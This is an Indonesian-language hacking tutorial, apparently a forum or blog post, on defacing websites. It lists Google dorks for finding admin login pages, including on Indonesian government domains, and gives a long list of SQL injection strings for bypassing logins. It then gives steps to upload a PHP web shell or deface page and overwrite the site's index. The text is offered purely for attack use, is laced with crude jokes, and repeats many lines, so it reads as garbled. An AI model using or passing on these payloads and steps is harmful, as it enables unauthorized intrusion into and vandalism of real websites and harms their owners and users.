DEFACE BYPASS ADMIN
3
G HAXOR TEAM
Yosh kita bertemu lagi dengan w Anonimokerl :v kali ini w mau share deface poc bypass admin :v seperti biasanya kita siapkan dulu syarat dan bahan-bahannya :v
Syarat :
-tamvam :v
-punya skill coli :v
-kesabaran :v
-tamvam :v
-punya skill coli :v
-kesabaran :v
Bahan :
- Dork
inurl:/administrator/login.php
inurl:/admin/index.php intext:username
inurl:/admin/index.php site:go.id
inurl:/administrator/login.php intext:username
inurl:/admin/main.ph inurl p intext:username
- Dork
inurl:/administrator/login.php
inurl:/admin/index.php intext:username
inurl:/admin/index.php site:go.id
inurl:/administrator/login.php intext:username
inurl:/admin/main.ph inurl p intext:username
inurl:/admin/login.html intext:login
inurl:/administrator/index.php intext:login
inurl:/adminweb/ intext:login.php
Kembangin lagi biar dapat perawan :v
Masa mau janda mulu :v
inurl:/administrator/index.php intext:login
inurl:/adminweb/ intext:login.php
Kembangin lagi biar dapat perawan :v
Masa mau janda mulu :v
-script deface
-script shell :v (ext php, phtml, php5 dll)
-sabun yang bolong :v
-internet :v
-script shell :v (ext php, phtml, php5 dll)
-sabun yang bolong :v
-internet :v
Macam - macam kode buat logginnya neeh :V
‘ or 1=1 or ”=’
‘ or 1=1–
‘ or 1=1#
‘ or 1=1/*
' or 1=1
' or '1'='1'
1' or 1=1
1' or '1'='1'
' or 'z'='z
‘) or ’1'=’1–
‘) or (’1'=’1–
” or 1=1–
or 1=1–
‘or 0=0 –
‘or ‘x’='x
‘or a=a-
“or 0=0 –
“or 0=0 #
“or “x”=”x
“)or(“a”=”a
admin’–
hi” or 1=1 –
hi’ or’a'=’a
hi”)or(“a”=”a
or 0=0 #
or a=a–
‘or 0=0 #
‘having 1=1–
“or 1=1–
“or “a”=”a
‘)or(‘a’='a
‘)or(‘x’='x
hi” or “a”=”a
hi’ or 1=1 –
hi’)or(‘a’='a
or 0=0 –
or 1=1–
1'or’1'=’1
Langkah-langkanya :
pertama kita dorking dulu di mbah google
pertama kita dorking dulu di mbah google
Lalu kita pilih salah satu site. Kalau vuln akan muncul kolom login, seperti gambar dibawah
Dan isi user dan paswordnya dengan '=''or' kalau gagal pake itu coba user dan paswordnya menggunakan admin
Kalau udah kita tekan aja submit
Dan taraa anda berhasil login menjadi admin :v
Kalau udah kita tekan aja submit
Dan taraa anda berhasil login menjadi admin :v
Sekarang kalian cari aja uploader, biasanya sih ada di gallery tapi beda beda ko :v
Kalo dah nemu kalian upload saja script shellnya atau defacenya, seperti gambar dibawah :v
Kalo dah nemu kalian upload saja script shellnya atau defacenya, seperti gambar dibawah :v
Kalo dah diupload kalian cari aja file yang tadi di upload biasanya ada digallery juga :v
Kalo dah ketemu kalian tekan aja gambar rusaknya dan pilih show url lalu copy dan paste di bar url browser.
Dan tara script deface atau shell kalian akan muncul.
Kalau kalian tadi upload shell maka kalian akses saja shellnya :v
Dan tara script deface atau shell kalian akan muncul.
Kalau kalian tadi upload shell maka kalian akses saja shellnya :v
kalian tebas saja indexnya :v
Dan taraaa kalian udah berhasil :v
okey sekian dari w mohon maaf bila banyak kesalahan :v
Kalau ada yang kurang mengerti bisa tanyakan aja di coment :v
Okey
Kalau ada yang kurang mengerti bisa tanyakan aja di coment :v
Okey
